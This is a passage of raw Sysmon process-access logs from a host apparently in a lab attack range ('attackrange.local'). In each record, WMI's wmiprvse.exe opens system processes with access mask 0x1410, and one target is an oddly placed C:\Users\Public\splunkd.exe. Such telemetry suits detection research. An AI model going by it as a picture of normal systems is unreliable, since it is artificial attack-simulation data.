Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027487Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027486Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.631{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 